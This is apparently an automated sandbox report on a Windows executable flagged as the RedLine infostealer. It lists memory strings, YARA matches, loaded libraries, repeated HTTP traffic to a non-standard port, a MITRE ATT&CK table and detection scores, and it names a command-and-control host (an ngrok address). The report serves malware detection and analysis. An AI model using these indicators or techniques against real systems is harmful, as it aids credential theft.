                  Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateLR
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                  Source: kuEfaZxkiY.exeString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                  Source: kuEfaZxkiY.exeString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E72000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E64000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E5F000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E6D000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E62000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dashboard.ngrok.com
                  Source: kuEfaZxkiY.exeString found in binary or memory: https://ipinfo.io/ip%appdata%

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: kuEfaZxkiY.exe, type: SAMPLEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: kuEfaZxkiY.exe, type: SAMPLEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.0.kuEfaZxkiY.exe.860000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 0.0.kuEfaZxkiY.exe.860000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000000.00000000.1687162319.0000000000862000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: Process Memory Space: kuEfaZxkiY.exe PID: 7080, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeCode function: 0_2_00F9E7B00_2_00F9E7B0
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeCode function: 0_2_00F9DC900_2_00F9DC90
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2945747636.0000000000FAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs kuEfaZxkiY.exe
                  Source: kuEfaZxkiY.exe, 00000000.00000000.1687162319.0000000000862000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs kuEfaZxkiY.exe
                  Source: kuEfaZxkiY.exeBinary or memory string: OriginalFilenameImplosions.exe4 vs kuEfaZxkiY.exe
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: kuEfaZxkiY.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: kuEfaZxkiY.exe, type: SAMPLEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: kuEfaZxkiY.exe, type: SAMPLEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.0.kuEfaZxkiY.exe.860000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 0.0.kuEfaZxkiY.exe.860000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000000.00000000.1687162319.0000000000862000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: Process Memory Space: kuEfaZxkiY.exe PID: 7080, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal96.troj.winEXE@2/0@1/1
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7160:120:WilError_03
                  Source: kuEfaZxkiY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: kuEfaZxkiY.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: kuEfaZxkiY.exeReversingLabs: Detection: 86%
                  Source: kuEfaZxkiY.exeVirustotal: Detection: 77%
                  Source: unknownProcess created: C:\Users\user\Desktop\kuEfaZxkiY.exe C:\Users\user\Desktop\kuEfaZxkiY.exe
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: kuEfaZxkiY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: kuEfaZxkiY.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: kuEfaZxkiY.exe, 00000000.00000002.2945747636.000000000100E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ServiceModel.pdb693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32d source: kuEfaZxkiY.exe, 00000000.00000002.2945747636.000000000100E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: kuEfaZxkiY.exe, 00000000.00000002.2945747636.000000000100E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: kuEfaZxkiY.exe, 00000000.00000002.2945747636.000000000100E000.00000004.00000020.00020000.00000000.sdmp
                  Source: kuEfaZxkiY.exeStatic PE information: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Uses known network protocols on non-standard ports
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 17383
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeMemory allocated: F90000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeMemory allocated: 2D00000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeMemory allocated: 2B80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe TID: 7164Thread sleep time: -90000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2945747636.000000000100E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]][
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeQueries volume information: C:\Users\user\Desktop\kuEfaZxkiY.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected RedLine Stealer
                  Source: Yara matchFile source: kuEfaZxkiY.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.kuEfaZxkiY.exe.860000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.1687162319.0000000000862000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: kuEfaZxkiY.exe PID: 7080, type: MEMORYSTR
                  Source: Yara matchFile source: kuEfaZxkiY.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.kuEfaZxkiY.exe.860000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.1687162319.0000000000862000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: kuEfaZxkiY.exe PID: 7080, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected RedLine Stealer
                  Source: Yara matchFile source: kuEfaZxkiY.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.kuEfaZxkiY.exe.860000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.1687162319.0000000000862000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: kuEfaZxkiY.exe PID: 7080, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                  DLL Side-Loading                  		1
                  Process Injection                  		2
                  Virtualization/Sandbox Evasion                  		OS Credential Dumping1
                  Security Software Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		LSASS Memory2
                  Virtualization/Sandbox Evasion                  		Remote Desktop ProtocolData from Removable Media11
                  Non-Standard Port                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                  Process Injection                  		Security Account Manager12
                  System Information Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Timestomp                  		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading                  		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  kuEfaZxkiY.exe87%ReversingLabsByteCode-MSIL.Infostealer.RedLine
                  kuEfaZxkiY.exe78%VirustotalBrowse
                  kuEfaZxkiY.exe100%AviraHEUR/AGEN.1305500
                  kuEfaZxkiY.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  0.tcp.in.ngrok.io9%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                  https://api.ipify.orgcookies//settinString.Removeg0%URL Reputationsafe
                  http://tempuri.org/Endpoint/CheckConnectLR0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/CheckConnectResponse0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/CheckConnect0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/EnvironmentSettingsLR0%Avira URL Cloudsafe
                  http://tempuri.org/0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/VerifyUpdateResponse0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/80%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/CheckConnectResponse1%VirustotalBrowse
                  http://tempuri.org/Endpoint/SetEnvironmentResponse0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/CheckConnect2%VirustotalBrowse
                  http://tempuri.org/Endpoint/CheckConnectLR2%VirustotalBrowse
                  http://tempuri.org/Endpoint/VerifyUpdateResponse1%VirustotalBrowse
                  http://tempuri.org/Endpoint/81%VirustotalBrowse
                  http://tempuri.org/Endpoint/SetEnvironmentLR0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/SetEnvironmentResponse1%VirustotalBrowse
                  http://tempuri.org/Endpoint/GetUpdatesLR0%Avira URL Cloudsafe
                  http://tempuri.org/0%VirustotalBrowse
                  http://tempuri.org/Endpoint/GetUpdatesResponse0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/VerifyUpdateLR0%Avira URL Cloudsafe
                  http://0.tcp.in.ngrok.io:17383/100%Avira URL Cloudmalware
                  http://tempuri.org/Endpoint/SetEnvironmentLR2%VirustotalBrowse
                  http://0.tcp.in.ngrok.io:17383100%Avira URL Cloudmalware
                  http://0.tcp.in.ngrok.io100%Avira URL Cloudmalware
                  http://tempuri.org/Endpoint/0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/GetUpdatesResponse1%VirustotalBrowse
                  http://0.tcp.in.ngrok.io9%VirustotalBrowse
                  http://tempuri.org/Endpoint/EnvironmentSettingsLR2%VirustotalBrowse
                  http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/1%VirustotalBrowse
                  http://tempuri.org/Endpoint/CheckConnectT0%Avira URL Cloudsafe
